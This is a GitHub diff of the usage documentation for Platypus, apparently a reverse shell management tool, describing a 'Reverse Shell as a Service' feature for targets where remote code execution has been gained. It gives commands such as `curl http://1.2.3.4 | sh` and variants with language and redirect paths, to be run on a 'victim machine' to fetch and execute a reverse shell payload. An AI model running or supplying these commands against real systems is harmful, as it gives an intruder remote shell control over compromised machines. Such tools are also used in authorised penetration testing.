You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardexpand all lines: USAGE.md
+32-14
Original file line number
Diff line number
Diff line change
@@ -1,26 +1,40 @@
1
1
## Reverse shell as a Service
2
-
Platypus is able to multiplexing the reverse shell listening port. The port 8080 can receive reverse shell client connection, also these is a Reverse Shell as a Service (RaaS) running on this port.
3
2
4
-
Assume that you have got an arbitrary rce on the target application, but the target application will strip the non-alph letter like `&`, `>`. then this feature will be useful.
3
+
Platypus is able to multiplex the reverse shell listening port. Port 8080 can receive reverse shell client connection, also there is a Reverse Shell as a Service (RaaS) running on this port.
5
4
6
-
To archive this, all you need is to construct a url which indicate the target
5
+
Assume that you have got an arbitrary RCE on the target application, but the target application will strip the non-alphabet letter like `&`, `>`. then this feature will be useful.
6
+
7
+
To archive this, all you need is to construct a URL that indicates the target.
8
+
9
+
### Quick start
10
+
11
+
1. Start platypus and listen to any port (eg: 1.2.3.4 1337)
12
+
2. Execute `curl http://1.2.3.4 | sh` on the victim machine
13
+
14
+
### Specifying language of reverse shell command (default: bash)
15
+
16
+
1. Start platypus and listen to any port (eg: 1.2.3.4 1337)
17
+
2. Execute `curl http://1.2.3.4/python | sh` on the victim machine
18
+
19
+
### What if I want to pop up the reverse shell to another IP (5.6.7.8) and port (7331)?
20
+
21
+
By default, the new reverse shell will be popped up to the server which the port which the HTTP request sent, but you can simply change the IP and port by following these steps:
22
+
23
+
1. Start platypus and listen to any port (eg: 1.2.3.4 1337)
24
+
2. Execute `curl http://1.2.3.4/5.6.7.8/7331/python | sh` on the victim machine
25
+
26
+
### How to add a new language
27
+
28
+
Currently, platypus support `awk`, `bash`, `go`, `Lua`, `NC`, `Perl`, `PHP`, `python` and `ruby` that were simply stolen from [PayloadAllThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md), and you can check `templates` folder to view all templates. Also, adding new language support is simple, just replace the real IP and port with `__HOST__` and `__PORT__`.
7
29
8
30
```bash
9
-
// victim will be redirected to attacker-host attacker-port
10
-
// sh -c "$(curl http://host:port/attacker-host/attacker-port)"
0 commit comments